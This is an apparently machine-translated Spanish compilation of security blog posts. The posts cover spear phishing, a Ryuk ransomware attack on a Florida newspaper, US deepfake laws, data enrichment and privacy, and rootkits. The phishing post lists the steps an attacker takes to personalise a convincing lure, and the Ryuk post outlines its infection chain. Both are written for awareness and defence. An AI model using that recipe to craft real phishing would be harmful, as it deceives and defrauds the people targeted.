El phishing , un método de ataque cibernético tan antiguo como los virus y los príncipes nigerianos, sigue siendo uno de los medios más populares para iniciar una violación contra individuos y organizaciones, incluso en 2020. La táctica es tan efectiva que ha generado una multitud de submétodos , incluyendo smishing (phishing a través de SMS), pharming y la técnica del día para este blog: spear phishing.

Pero primero, una parábola rápida.

Un amigo mío recibió una avalancha de correos electrónicos en el transcurso de unos días, todos orientados hacia su cuenta de Netflix.

Click para agrandar

Las pistas que indicaban que algo no estaba bien eran numerosas:

• Hubo media docena de correos electrónicos en lugar de solo uno.
• Todos ellos requerían información de pago, pero cada correo daba una razón diferente de por qué.
• Hubo errores ortográficos en abundancia.
• Los correos electrónicos no fueron personalizados de ninguna manera.

Incluso sin detectar la URL completamente falsa, no HTTPS vinculada desde el cuerpo del correo electrónico, este amigo nunca hubiera caído en la trampa. Por supuesto, tienen un conocimiento decente de los conceptos básicos de seguridad. Sin embargo, considere si el atacante había hecho esto:

• Tomé algunos datos personales de un volcado de datos
• Cazado en línea para cuentas que pertenecen a esta persona, tal vez en las redes sociales
• Comprobado para ver si tenían una cuenta con Netflix
• Diseñó una dirección de correo electrónico de Netflix de imitación
• Se dirigió a la víctima potencial directamente por su nombre
• Incluyó parte o la totalidad de su domicilio
• Hizo uso del corrector ortográfico
• Configure un sitio web HTTPS gratuito
• Usó la versión más actual del logotipo de Netflix

¿Ver la diferencia? Si bien el primer conjunto de correos electrónicos no pasaría bien con un usuario con poco conocimiento, el segundo sería mucho más difícil de detectar como falso.

Y eso es lo que se conoce en el negocio como spear phishing .

¿Qué es el spear phishing?

El único propósito de Spear Phishing es meterse en la cabeza del destinatario y hacerles creer que los mensajes a los que responden son 100% legítimos, logrados debido a toques personales diseñados para hacerles pensar que lo que están tratando es el verdadero negocio.

Si bien podría argumentar que las alarmas deben sonar cuando se le solicitan los detalles de la tarjeta de crédito, con toda honestidad, una vez que el estafador ha arrojado algunos detalles personales en la mezcla, como el nombre y la dirección, puede ser demasiado tarde.

Imagínese si el estafador monitorea las fuentes de las redes sociales para ver cuál muestra su objetivo, y luego dijo algo como «Por favor, asegúrese de que sus datos sean correctos para continuar disfrutando de The Witcher». Ahora agregue una foto de Henry Cavill con un aspecto genial.

Juego. Terminado.

Como es de esperar, este tipo de ataque es bastante difícil de combatir. No ayuda cuando las tonterías completamente aleatorias, como el intento de phishing de Netflix mal hecho, regularmente causan grandes pérdidas en las organizaciones de todo el mundo, a pesar de ser bastante terrible.

¿Cuántas veces hemos visto instalaciones de atención médica e incluso gobiernos municipales locales que no cumplen con el ransomware a través de fingir archivos adjuntos de hojas de cálculo en correos electrónicos falsos de impuestos de recursos humanos? No se equivoquen, este es un problema muy real e inmediato para aquellos atrapados.

Dado que el phishing genérico ya está causando enormes dolores de cabeza tanto a las empresas como a los consumidores, los ciberdelincuentes que utilizan volcados de datos combinados por expertos con técnicas profesionales de ingeniería social tienen una probabilidad cada vez mayor de éxito. Y eso es antes de considerar otras formas de spear phishing, como el secuestro de conversación (más sobre esto más adelante) o los ataques que usan el spear phishing como plataforma de lanzamiento para infectar redes con malware y otras amenazas digitales.

¿Veamos algunos números?

Mira esas verticales

Hace unos años, el costo promedio de la prevención del phishing durante 12 meses fue de $ 319,327 frente al costo significativamente más alto de cualquier ataque exitoso, que pesó $ 1,6 millones . En 2019, las estadísticas que se inclinan fuertemente hacia el spear phishing hablan por sí mismas, y los grandes pagos para los estafadores están a la orden del día.

Los pagos de $ 40 millones, $ 50 millones e incluso $ 70 millones y más son comunes , y eso es antes de llegar al costo de la limpieza y las demandas colectivas . Agregue un poco de daño de reputación y una tormenta de fuego de relaciones públicas, y tendrá todos los ingredientes para una violación exitosa. Para las víctimas, no tanto.

Con la suplantación de identidad (phishing), la más mínima información puede provocar la caída de una organización a medida que corta todas sus defensas de seguridad que de otro modo serían completamente funcionales.

Evolución de la lanza phish

La suplantación de identidad no solo se deja en el ámbito de los correos electrónicos. Los ataques altamente dirigidos también se ramifican en otras áreas, especialmente aquellas llenas de información voluntaria. El secuestro de conversaciones de soporte al cliente en Twitter es un gran ejemplo de esto : los estafadores crean cuentas de soporte de imitación y luego entran en la conversación, llevando a la víctima al centro de phishing. Es un movimiento hábil.

Es discutible la cantidad de estas estafas dirigidas, teniendo en cuenta que están haciendo su ataque sobre la marcha, en lugar de meterse con el conocimiento previamente adquirido. La diferencia aquí es que el reconocimiento está dirigido a la persona a la que la víctima potencial está siendo ayudada , a diferencia de la víctima misma. Tomar nota de cuándo la cuenta de atención al cliente está activa, mirar los Tweets iniciales para que puedan fingir ser la misma persona que ayudó antes, y adoptar algunos de sus gestos del habla / habla corporativa ayudan a crear una ilusión convincente.

En ese momento, todo lo que realmente estamos tratando es un correo electrónico de imitación perfectamente diseñado pero en forma humana, y con la capacidad de interactuar con la víctima. ¿El spear phishing ha visto alguna vez una forma tan potente de ir a la ofensiva? Cuando las personas están felices de utilizar el servicio de atención al cliente para usarlo en su contra, es realmente algo para sentarse y considerar.

Luchando contra la creciente ola de spear phishing

Cualquiera puede ser un objetivo, pero los ejecutivos, especialmente a nivel de CEO, es donde está en términos de grandes puntajes para los delincuentes (una forma de ataque a veces llamada caza de ballenas). Por necesidad, la mayoría de los ejecutivos de las organizaciones están configurados para ser visibles públicamente, y los estafadores se aprovechan de esto. Como se ha mencionado, esta es una de las formas de ataque más difíciles de defender.

Si el componente de ingeniería social está diseñado para abrir la red al abuso de malware , entonces también debemos considerar la infraestructura de seguridad general. El software de seguridad , las actualizaciones, los cortafuegos y más se convierten en herramientas importantes en la guerra contra la suplantación de identidad (phishing), especialmente teniendo en cuenta lo que puede venir después del ataque inicial de la puerta.

Las herramientas como el filtrado y la detección de correo no deseado son excelentes para ataques casuales aleatorios, pero dada la naturaleza directa de la suplantación de identidad, puede ser un puente demasiado lejos para que la automatización lo señale como sospechoso. La capacitación continua y dedicada es importante en todos los niveles del negocio, además de no acostumbrarse a culpar a los empleados y a terceros cuando las cosas salen mal (y eventualmente lo harán). No desea que las personas tengan menos probabilidades de denunciar incidentes por temor a meterse en problemas: no es productivo y no ayudará a nadie.

Las herramientas para ayudar a informar ataques de phishing, ya sea aplicaciones dedicadas o algo basado en la web dentro de la red, siempre son útiles. También es bueno asegurarse de que los departamentos tengan al menos una idea de cuán importantes son los procesos comerciales en otros departamentos. Asegurar la organización es un poco más fácil cuando el departamento A no relacionado es una capa adicional de defensa para el departamento B. No relacionado Preste atención a los recursos humanos, la contabilidad y la interacción ejecutiva de primera línea.

Si su organización aún no ha considerado qué bloquear , nunca ha habido un mejor momento. El informe EC3 de Europol sobre spear phishing se publicó a fines del año pasado y contiene una gran cantidad de información sobre el tema para aquellos que quieran profundizar.

Considere todas las formas de phishing , vea cuáles pueden ser el mayor peligro para su organización y sus empleados, y comience a descubrir la mejor manera de abordar el problema. No te arrepentirás, pero los estafadores ciertamente lo harán.

El periódico de Florida The Tampa Bay Times sufrió un ataque de ransomware Ryuk el jueves, convirtiéndose en la última víctima importante de la notoria familia de ransomware que sigue aumentando en popularidad.

Curiosamente, el periódico es al menos la tercera víctima de Ryuk con sede en Florida en el último año.

El ataque, que The Tampa Bay Times informó sobre sí mismo , no resultó en ningún dato violado. La información confidencial del cliente, como las direcciones de los suscriptores y los detalles de la tarjeta de crédito, no se reveló en la violación, dijo el periódico.

El director digital del Tampa Bay Times , Conan Gallaty, dijo que el periódico tenía «muchos planes para sistemas que se caen», y que su prioridad era restaurar y asegurar las operaciones.

«El enfoque para nosotros es recuperarnos por completo y luego trabajar en nuevas medidas preventivas», dijo Gallaty.

El periódico no respondió a los actores de la amenaza, y Gallaty dijo que el periódico habría rechazado cualquier pago de rescate exigido. Esta oposición incondicional se está volviendo menos común hoy en día, ya que cada vez más empresas se ven obligadas a elegir entre la pérdida de varios cientos de miles de dólares en pagos de rescate o varios cientos de miles de dólares en recuperación de bases de datos y operaciones.

Además, cuando algunas empresas contratan la ayuda de empresas externas de recuperación de malware, pueden suscribirse, silenciosamente, a negociaciones de ransomware. Una investigación de ProPublica el año pasado descubrió que al menos dos empresas de ciberseguridad que promocionaban soluciones tecnológicas supuestamente avanzadas, de hecho, pagarían los rescates exigidos por los actores de amenazas que violaron a sus clientes .

La investigación de dos empresas encontró que:

“Las empresas [de ciberseguridad] son ​​similares en otros aspectos. Ambos cobran a las víctimas honorarios sustanciales además de los montos de rescate. También ofrecen otros servicios, como sellar infracciones para proteger contra futuros ataques. Ambas empresas han utilizado alias para sus trabajadores, en lugar de nombres reales, para comunicarse con las víctimas «.

Aunque The Tampa Bay Times no reveló el vector de ataque del ransomware Ryuk, Gallaty dijo que creía que era poco probable que el periódico fuera un objetivo específico para los actores de la amenaza. Eso es difícil de conciliar con la historia de Ryuk: ya ha sido responsable de paralizar las operaciones de entrega de al menos cuatro periódicos estadounidenses importantes , incluidos The Chicago Tribune y The Los Angeles Times .

Al hablar con The Tampa Bay Times , el investigador senior de seguridad de Malwarebytes, JP Taggart, explicó el cálculo detrás de los posibles objetivos de ransomware Ryuk:

«Están mirando a las personas que tienen más que perder».

Eso es cierto cuando se mira a las víctimas recientes de Ryuk.

En junio de 2019, el gobierno de Lake City, Florida, se detuvo, con teléfonos y sistemas informáticos paralizados después de que los actores de la amenaza implantaran con éxito una variante de Ryuk en la red de la ciudad. Incapaces de solucionar el problema, incluso con la ayuda del FBI, la ciudad tuvo que tomar una decisión. Decidió pagar $ 460,000 . Una situación similar ocurrió meses después, en octubre, cuando el Sistema de Salud DCH con sede en Alabama se vio obligado a cerrar parcialmente tres de sus hospitales después de un ataque de Ryuk. Nuevamente, incapaz de resolver el problema e incapaz de continuar rechazando a todos los pacientes menos a los más críticos, el operador del hospital decidió priorizar la atención al paciente, pagando una cantidad no revelada a los actores de la amenaza.

Esos pagos se suman. Según CrowdStrike, los equipos de despliegue de Ryuk han acumulado más de $ 3.7 millones en rescates pagados .

Sin embargo, cuando los actores de la amenaza de Ryuk no han logrado un gran día de pago, todavía han logrado hacer un daño enorme. En abril de 2019, el Condado de Imperial, California, se negó a pagar un enorme rescate de $ 1.3 millones por un ataque de Ryuk, pero, según The Wall Street Journal , la ciudad ha gastado $ 1.6 millones en esfuerzos de recuperación . A fines de diciembre, la Guardia Costera de Estados Unidos anunció públicamente que sufrió un ataque de Ryuk que cerró una instalación marítima durante 30 horas .

Las campañas de ransomware se volvieron tan comunes que el FBI advirtió al público que los actores de amenazas habían utilizado Ryuk para atacar a más de 100 empresas estadounidenses e internacionales desde su aparición en agosto de 2018.

Según los nuevos datos de Malwarebytes, esos ataques han continuado. Del 1 al 23 de enero de 2020, Malwarebytes registró un total de 724 detecciones de Ryuk. Las detecciones diarias fluctuaron, con el recuento de detección más bajo a los 18 años el 6 de enero y el recuento de detección más alto a los 47 el 14 de enero.

El ransomware con frecuencia funciona junto con Emotet y TrickBot en ataques de varias etapas. Esas familias separadas de malware también han estado activas en el nuevo año, con pequeños picos en las miles de detecciones. Emotet, particularmente, se puso en marcha nuevamente a partir del 13 de enero .

Como explicamos antes en nuestro foco de amenaza sobre Ryuk :

“La primera etapa del ataque comienza con un archivo de documento armado de Microsoft Office, es decir, contiene un código macro malicioso, adjunto a un  correo electrónico de phishing . Una vez que el usuario lo abre, la macro maliciosa se ejecutará  cmd y ejecutará un comando de PowerShell. Este comando intenta descargar  Emotet .

Una vez que Emotet se ejecuta, recupera y ejecuta otra carga maliciosa, generalmente  TrickBot, y recopila información sobre los sistemas afectados. Inicia la descarga y ejecución de TrickBot al contactar y descargar desde un host malicioso remoto preconfigurado.

Una vez infectados con TrickBot, los actores de la amenaza verifican si el sistema es parte de un sector al que se dirigen. Si es así, descargan una carga útil adicional y usan las credenciales de administrador robadas con TrickBot para realizar movimientos laterales para alcanzar los activos que desean infectar.

Los actores de la amenaza comprueban y establecen una conexión con los servidores en vivo del objetivo a través de un  protocolo de escritorio remoto (RDP) . A partir de ahí, dejan caer a Ryuk.

El Tampa Bay Times no especificó qué sistemas, o cuántas computadoras, fueron interrumpidas en el ataque del jueves. En cambio, el único indicio de inconveniente en la rutina del periódico fue el reconocimiento de que el periódico del viernes se publicaría con una fecha límite anterior.

En un raro ejemplo de apuro legislativo, se introdujeron aproximadamente una docena de proyectos de ley estatales y federales en los últimos 12 meses para regular las falsificaciones profundas, la tecnología relativamente moderna que algunos temen podría anular la democracia.

Aunque las propuestas federales aún tienen que avanzar, los proyectos de ley estatales han tenido un rápido éxito en casa. Ya tres estados, California, Virginia y Texas, han promulgado leyes falsas, y hay legislación pendiente en Massachusetts, Nueva York y Maryland, que presentó su propia ley el 16 de enero de este año.

Las leyes y la legislación pendiente varían en alcance, sanciones y enfoque.

La ley de Virginia modifica la ley penal actual sobre el porno de venganza, por lo que es un delito, por ejemplo, insertar la imagen digital de una mujer en un video pornográfico sin su consentimiento. La ley de Texas, por otro lado, prohíbe el uso de falsificaciones profundas para la interferencia electoral, como hacer un video que muestra fraudulentamente a un candidato político en un mitin neonazi un mes antes de una elección.

Un proyecto de ley de Nueva York aborda un tema completamente diferente: cómo tratar la imagen digital de una persona fallecida, una realidad que está llegando a una pantalla cerca de usted (protagonizada por James Dean). Y dos leyes estatales potencialmente abordan la creciente amenaza de «fraudes baratos», fraudes digitales de baja tecnología que no requieren herramientas de inteligencia artificial para hacer.

Se espera esta experimentación legislativa para una tecnología emergente, dijo Matthew F. Ferraro, asociado senior de la firma de abogados WilmerHale que asesora a clientes sobre seguridad nacional, seguridad cibernética y gestión de crisis.

«De alguna manera, este es [un ejemplo] de los laboratorios de la democracia», dijo Ferraro, citando una idea popularizada hace décadas por el juez de la Corte Suprema Louis Brandeis. «Esto es lo que la gente anima».

Pero una categoría de legislación de falsificación profunda se ha ganado más malestar que otras, del tipo que únicamente regula la posible interferencia electoral. Grupos como la Unión Americana de Libertades Civiles, Electronic Frontier Foundation y First Draft, que investiga y combate la desinformación, advierten sobre amenazas a la libertad de expresión.

Además, priorizar la legislación política de falsificaciones profundas podría, en efecto, desestabilizar el problema más grande de la pornografía de falsificación profunda, que representa un enorme 96 por ciento del material de falsificación profunda en línea hoy , dijo Adam Dodge, fundador de la organización sin fines de lucro End Technology-Abuse, o EndTAB.

«Creo que es importante que abordemos el daño futuro, simplemente no quiero que eso ocurra a expensas de las personas que se ven perjudicadas en este momento», dijo Dodge. «Tenemos cuatro leyes profundas en los libros en los Estados Unidos, y el 50 por ciento de ellas no abordan el 96 por ciento del problema».

Hoy, Malwarebytes ofrece una visión más detallada de la legislación y las leyes de deepfakes en los Estados Unidos, siguiendo nuestro análisis la semana pasada de las primeras reglas federales de deepfake del país . Mucho más allá de lo que requiere ese lenguaje, los siguientes proyectos de ley y leyes exigen sanciones civiles y penales, y abordan directamente las preocupaciones de desinformación política y pornografía no consensuada.

Legislación federal de falsificaciones profundas ante el Congreso

Ante los legisladores en Washington, DC, hay al menos cuatro proyectos de ley federales falsos tanto en la Cámara de Representantes de Estados Unidos como en el Senado. Son:

• La Ley de Identificación de Salidas de Redes Adversarias Generativas (IOGAN)
• La Ley del Informe Deepfake de 2019
• Un proyecto de ley para exigir al Secretario de Defensa que realice un estudio sobre la explotación cibernética de los miembros de las Fuerzas Armadas y sus familias y para otros fines
• La defensa de todas y cada una de las falsas apariencias manteniendo sujeto de explotación (FALSAS PROFUNDAS) a la Ley de Responsabilidad

Los proyectos de ley en gran medida el uno al otro. La Ley IOGAN, por ejemplo, requeriría que los directores de la Fundación Nacional de Ciencia y el Instituto Nacional de Estándares y Tecnología presenten informes al Congreso sobre posibles oportunidades de investigación con el sector privado del país para detectar falsificaciones profundas.

La Ley de Informe de Deepfake requeriría que el Departamento de Seguridad Nacional presente un informe al Congreso sobre las tecnologías utilizadas para crear y detectar las falsificaciones. El proyecto de ley de «explotación cibernética» del senador Ben Sasse requeriría que el Secretario de Defensa estudie las vulnerabilidades potenciales de los miembros de las fuerzas armadas de EE. UU. A la explotación cibernética, incluidas «imágenes y videos malversados, así como falsificaciones profundas».

Sin embargo, la Ley de Responsabilidad FALSA PROFUNDA se extiende más allá de los requisitos de informes e investigación. Si se aprueba, el proyecto de ley requeriría que cualquiera que haga una falsificación profunda, ya sea imagen, audio o video, etiquete la falsificación profunda con una «marca de agua» que muestre la fraudulencia de la falsificación profunda.

Pero Dodge dijo que las marcas de agua y las etiquetas no ayudarían a nadie cuya imagen se use en un video porno falso sin consenso.

«La realidad es que, cuando se trata de la batalla contra las falsificaciones profundas, todos se centran en la detección, en desacreditar y desenmascarar un video como una falsificación profunda», dijo Dodge. «Eso no ayuda a las mujeres, porque a las personas que miran esos videos no les importa que sean falsas».

La Ley de Responsabilidad de FALSAS PROFUNDAS convertiría en delito dejar de proporcionar esa marca de agua, castigada con hasta cinco años de prisión. Además, el proyecto de ley impondría una multa civil de hasta $ 150,000 por cada falla intencional de proporcionar una marca de agua en una falsificación profunda.

Según Electronic Frontier Foundation, esas son sanciones severas por actividades que el proyecto de ley en sí mismo no define por completo. Por ejemplo, hacer una falsificación profunda con la intención de «humillar» a alguien se convertiría en un delito, pero no hay una definición clara de lo que significa ese término, o si esa humillación requeriría daño. En el intento del proyecto de ley para detener la actividad engañosa y maliciosa, dijo la organización, puede haber llegado demasiado lejos.

«La [Ley de Responsabilidad de FALSIDAD PROFUNDA] subraya una pregunta clave que debe ser respondida: desde una perspectiva legal y legislativa, ¿cuál es la diferencia entre un video malicioso ‘deepfakes’ y una sátira, parodia o entretenimiento?» , Escribió la organización . «Lo que los legisladores han discutido hasta ahora muestra que no saben cómo hacer estas distinciones».

En todo el estado, las preocupaciones cambian a si la legislación de falsificación profunda tendrá el efecto deseado.

Leyes y leyes estatales de deepfakes

El verano pasado, las advertencias sobre la democratización de la tecnología de deepfakes se hicieron realidad: una nueva aplicación ofrecida de forma gratuita en Windows brindaba a los usuarios la capacidad de quitar la ropa de las fotos cargadas de mujeres . La aplicación, llamada DeepNude, fue descubierta por primera vez por Motherboard. Se cerró solo horas después de que el medio publicó su primer artículo .

Menos de una semana después, entró en vigencia una nueva ley de falsificación profunda en Virginia. Los legisladores estatales lo aprobaron meses antes, en marzo.

Única en comparación con las leyes estatales de deepfake posteriores, la ley de Virginia no creó un nuevo delito para la creación y distribución de deepfake, sino que amplió su ley actual sobre el porno de venganza para incluir material de deepfakes. Ahora, en Virginia, cualquiera que comparta o venda imágenes y videos de desnudos o sexuales, incluidos los falsos, con la intención de «coaccionar, acosar o intimidar», es culpable de un delito menor de Clase 1.

Dodge dijo que apreciaba el enfoque de Virginia.

«La ley de Virginia es interesante porque es la única ley que ha tomado la sección existente del código penal de pornografía no consensuada y la ha modificado para incluir la pornografía profunda», dijo Dodge, «y eso me gusta».

Poco después de que Virginia promulgara su ley de falsificación profunda, Texas la aprobó y aprobó una ley que se centró en la interferencia electoral. De acuerdo con la ley, el acto de crear y compartir un video falso dentro de los 30 días de una elección con la intención de «dañar a un candidato o influir en el resultado de una elección» es ahora un delito menor de Clase A. La definición de la ley de una falsificación profunda es amplia: un video «creado con la intención de engañar, que parece representar a una persona real realizando una acción que no ocurrió en la realidad».

La ley ya recibió un caso de uso de alto perfil: el alcalde de Houston Sylvester Turner le pidió al fiscal de distrito que investigara la campaña de su oponente para hacer un anuncio de televisión que mostrara fotos editadas del alcalde, junto con un texto supuestamente falso que envió.

En octubre, California siguió tanto a Virginia como a Texas, aprobando dos leyes: una para prohibir la pornografía no consensuada de pornografía profunda y la otra para prohibir las falsificaciones profundas utilizadas para afectar el resultado de una próxima elección.

El autor de los proyectos de ley, el miembro de la Asamblea Marc Berman, dijo que escribió el último proyecto de ley después de que alguien creó y compartió un video alterado de Nancy Pelosi, que parecía mostrarla como discapacitada o borracha. Pero el video distaba mucho de ser falso. En cambio, su creador simplemente tomó imágenes del Presidente de la Cámara de Representantes y lo desaceleró, haciendo lo que ahora se conoce como una «falsificación barata».

Sin embargo, Ferraro dijo que tratar de aprobar legislación para evitar falsificaciones baratas será difícil.

«Va a ser muy difícil redactar un proyecto de ley que capture todos los llamados falsos baratos, porque la edición regular de videos podría caer dentro de una definición que es demasiado amplia», dijo Ferraro, explicando que las entrevistas estándar de transmisión diaria incorporan innumerables ediciones que pueden cambiar la impresión general de la entrevista para el público, incluso cuando las ediciones se realizan por razones no maliciosas, como separarse de un candidato político para dar un discurso para mostrar a su audiencia.

«Ese es el tipo de problema de la fake barato: la edición simple puede dar impresiones muy diferentes, en función del contenido», dijo Ferraro.

Mientras California, Texas y Virginia trabajan en la aplicación de sus leyes, Maryland, Nueva York y Massachusetts están considerando sus propios enfoques para legislar falsificaciones profundas.

El 16 de enero, Maryland presentó un proyecto de ley dirigido a las falsas influencias políticas. El proyecto de ley, que tiene una audiencia programada para principios de febrero, prohíbe que las personas «influyan o intenten influir intencionalmente o deliberadamente en la decisión de un votante de ir a las urnas o de votar por un candidato en particular mediante la publicación, distribución o difusión de una falsificación profunda». en línea dentro de los 90 días de una elección «.

La legislación de falsificación profunda de Massachusetts penalizaría el uso de falsificaciones profundas por «conducta criminal o tortuosa», lo que en efecto haría ilegal el uso de falsificaciones profundas junto con la realización de otros delitos. Entonces, ¿cometer fraude? Eso es un crimen ¿Pero desplegar una imitación profunda para ayudar a cometer ese fraude? Bueno, eso también sería un crimen.

Finalmente, en Nueva York, los legisladores estatales están tratando de legislar un aspecto diferente de las falsificaciones profundas y las recreaciones digitales: los derechos a la imagen digital de un individuo. El proyecto de ley se presentó el año pasado, expiró y luego se volvió a presentar. Protegería la imagen digital de una persona 40 años después de su muerte. El proyecto de ley también crearía un registro para los familiares sobrevivientes para registrar su control de la semejanza de un pariente fallecido.

La Screen Actors Guild ‐ American Federation of Television and Radio Artists apoyó el proyecto de ley.

«La sólida comunidad de desempeño del estado no debería tener que soportar años de litigios costosos para proteger sus medios de vida básicos y su legado artístico», dijo el grupo .

Los principales estudios cinematográficos, incluidos Disney, Warner Bros. y NBCUniversal se opusieron al proyecto de ley. Aunque los cineastas de Disney dijeron que recibieron la aprobación del patrimonio del difunto actor Peter Cushing para usar su imagen en la película de 2017 Star Wars: Rogue One, no es difícil ver por qué la aprobación requerida para futuros proyectos sería un obstáculo para Hollywood.

¿Qué sigue?

La oposición a las leyes de falsificación profunda es clara: tales leyes podrían ser excesivas, desinformadas y, en su intento de regular un problema, en realidad pisotear los derechos protegidos de los estadounidenses.

La pregunta más importante es, ¿ha tenido éxito la oposición? En una palabra, no.

Texas aprobó su ley de falsificación de interferencias electorales sin votos de oposición registrados ni en la Cámara ni en el Senado (aunque dos miembros de la Cámara fueron un «sin voto» y cuatro se abstuvieron). De manera similar, California aprobó su ley de falsificación de interferencia electoral en una votación de 67-4 en la Asamblea y una votación de 29-7 en el Senado . Después de la votación, la ACLU de California escribió al gobernador de California, pidiéndole un veto. No funcionó.  

Sin embargo, en Washington, DC, la situación podría ser diferente, ya que el mes pasado se aprobaron nuevas reglas federales sobre la investigación de falsificación profunda. Esas reglas requieren que el Director de Inteligencia Nacional presente un informe al Congreso en 180 días sobre las capacidades de falsificación profunda en todo el mundo y las posibles contramedidas en los Estados Unidos. Hasta que se presente ese informe, los senadores y representantes podrían tener poco apetito para avanzar.

Al igual que el alcance general de las leyes de privacidad de datos el año pasado, el futuro de las leyes falsas depende de la voluntad política, la popularidad y si los legisladores tienen tiempo para redactar y aprobar dicha legislación. Es, después de todo, un año electoral.

¿Cómo saben sus marcas favoritas usar su nombre en la línea de asunto de sus correos electrónicos? ¿Por qué parece obtener descuentos y ofertas especiales en productos que ha comprado recientemente? Las empresas pueden personalizar sus mensajes de marketing gracias al enriquecimiento de datos.

El enriquecimiento de datos se aplica al proceso de mejorar, refinar y mejorar los datos sin procesar. Por lo general, es el último paso en la construcción de un conjunto de datos para una campaña de marketing, pero se puede utilizar para varios otros objetivos.

El enriquecimiento por contacto es la forma más común de enriquecimiento de datos. El enriquecimiento de contactos es el proceso de agregar información adicional a los contactos existentes para obtener datos más completos.

Considere, por ejemplo, el escenario en el que una base de datos contiene nombres y direcciones, pero le faltan números de teléfono que los equipos de ventas necesitarán para comunicarse con los posibles clientes. Una opción es aplicar el enriquecimiento de contactos que puede hacer coincidir los datos que contiene la base de datos existente con los números de teléfono que figuran en otra base de datos.

Definición de enriquecimiento de datos, extendido

El enriquecimiento de datos se define como la fusión de datos de terceros de una fuente autorizada externa con una base de datos existente de datos de clientes de terceros. Algunas organizaciones hacen esto para mejorar los datos que ya poseen para que puedan tomar decisiones más informadas.

En términos más generales, el enriquecimiento de datos se refiere a los procesos utilizados para mejorar, refinar o mejorar los datos sin procesar. En este contexto, abarca toda la estrategia y el proceso necesarios para mejorar las bases de datos existentes. Esta idea y otros conceptos relacionados son esenciales para hacer de los datos un activo valioso para casi cualquier empresa moderna.

Procesos de enriquecimiento de datos.

Aunque el enriquecimiento de datos se puede lograr de varias maneras diferentes, muchas de las herramientas utilizadas para refinar datos en un conjunto de datos se centran en corregir errores o completar datos incompletos. Un proceso común de enriquecimiento de datos, por ejemplo, corregiría errores ortográficos probables o errores tipográficos en una base de datos mediante el uso de algoritmos de precisión diseñados para ese propósito. Y algunas herramientas de enriquecimiento de datos también podrían agregar información a tablas de datos simples.

Otra forma en que el enriquecimiento de datos puede funcionar es extrapolando datos. A través de metodologías como la lógica difusa, los ingenieros pueden producir información adicional a partir de un conjunto de datos brutos dado. Este y otros proyectos similares también pueden describirse como actividades de enriquecimiento de datos.

El enriquecimiento de datos también puede incluir la fusión de tablas de datos en un nuevo conjunto de datos mediante el uso de los campos correspondientes. En términos simples: las empresas pueden comprar el acceso a otras bases de datos y buscar información adicional sobre sus clientes, agregando esa información a su propia base de datos.

Preocupaciones sobre la privacidad

La fusión o combinación de datos casi nunca ocurre después de que se le haya pedido permiso a un sujeto. Esto plantea un problema de privacidad, ya que los usuarios suelen tener una idea razonable sobre qué información han proporcionado a una organización específica, pero si las organizaciones agregan información de otras bases de datos, esta imagen será sesgada. La organización tendrá información sobre ellos de la cual no están al tanto.

Mientras esta sea información generalmente disponible, el problema es menor. Pero considere el famoso ejemplo de su compañía de seguros obteniendo los datos recopilados en la tarjeta de cliente de su supermercado. Saber lo que compra y consume puede ser algo que preferiría ocultarles.

Existen algunas normas de privacidad que limitan el enriquecimiento de datos por este mismo motivo. El Reglamento General de Protección de Datos (GDPR) es un reglamento sobre protección de datos y privacidad en la Unión Europea (UE) y el Espacio Económico Europeo (EEE). También aborda la transferencia de datos personales fuera de las áreas de la UE y el EEE. GDPR permite a los clientes preguntar qué información está presente sobre ellos en la base de datos de una organización y eliminar registros o partes de los registros.

Dado que GDPR también regula el intercambio y la transferencia de datos personales, esto puede limitar severamente la elección de una organización de proveedores de enriquecimiento de datos. En la terminología GDPR, cualquier proveedor de datos que utilice es un «Procesador de datos». Para enviar los datos de los ciudadanos de la UE a cualquier Proveedor de datos para cualquier propósito, incluido el enriquecimiento, debe tener un Acuerdo de procesamiento de datos (DPA) firmado con el vendedor.

Un DPA es un contrato legalmente vinculante que establece los derechos y obligaciones de cada parte con respecto a la protección de datos personales. Son obligatorios para establecer una cadena de responsabilidad por el uso y la seguridad de los datos personales.

Pasos para el enriquecimiento exitoso de datos

Hay algunas cosas que hacer antes de embarcarse en un proceso exitoso de enriquecimiento de datos:

• Desinfecte sus propios datos, o terminará pagando por datos que nunca usará. Obtener información adicional sobre personas no existentes o agregar a registros incompletos es un desperdicio.
• Determine sus objetivos y propósito para el ejercicio de enriquecimiento de datos. Nuevamente, evite pagar por datos que resulten inútiles. No pague por tablas de datos solo porque están disponibles. Si no los va a usar, omítalos.
• Determine qué procesos admitirán los datos enriquecidos. ¿El rendimiento proyectado superará el costo?
• Determine su mercado objetivo en términos de perfiles de cuenta y personas. ¿Desea los datos de un subconjunto de clientes que cumplen con ciertos criterios, o le gustaría, por ejemplo, excluir a los residentes de los países que aplican el RGPD?

Desinfectar no solo significa eliminar duplicados, sino también verificar la validez de los datos más antiguos y la utilidad de las entradas que fueron completadas por clientes o posibles clientes, en su sitio web, por ejemplo.

Una vez que haya determinado sus objetivos y haya decidido qué datos son cruciales para lograr estos objetivos, comience a buscar un proveedor de datos. Algunos pueden ser más caros pero más fuertes en un determinado campo de datos. Puede maximizar su éxito al encontrar el proveedor de datos que mejor se adapte a sus necesidades.

No todo el enriquecimiento de datos te hace rico

Tenga en cuenta que comprar y almacenar los datos adicionales le costará. Es necesario hacer una copia de seguridad y proteger los datos, y los costos de almacenamiento pueden ascender a una suma considerable dependiendo del tamaño de los conjuntos de datos. Y si los datos no se mantienen actualizados, es posible que pronto pierdan su valor.

Finalmente, si alguna vez se viola, la cantidad y el tipo de datos filtrados son factores determinantes para la consiguiente pérdida de reputación.

Si alguna vez se encuentra en el extremo receptor de un ataque de rootkit, comprenderá por qué hoy en día se consideran una de las amenazas cibernéticas más peligrosas.

Los rootkits son un tipo de malware diseñado para permanecer sin ser detectado en su computadora. Los ciberdelincuentes usan rootkits para acceder y controlar su máquina de forma remota, enterrándose profundamente en el sistema como una garrapata enganchada. Los rootkits generalmente infectan las computadoras a través del correo electrónico de phishing , engañando a los usuarios con un correo electrónico de aspecto legítimo que en realidad contiene malware, pero a veces se pueden entregar a través de kits de explotación.

Este artículo proporciona una descripción general de los diferentes tipos de rootkits y explica cómo puede evitar que infecten su computadora.

¿Qué es un rootkit?

Originalmente, un rootkit era una colección de herramientas que permitían el acceso administrativo a una computadora o red. Hoy en día, los rootkits están asociados con un tipo de software malicioso que proporciona acceso privilegiado a nivel de raíz a una computadora mientras oculta su existencia y sus acciones. Los hackers usan rootkits para ocultarse hasta que deciden ejecutar su malware malicioso.

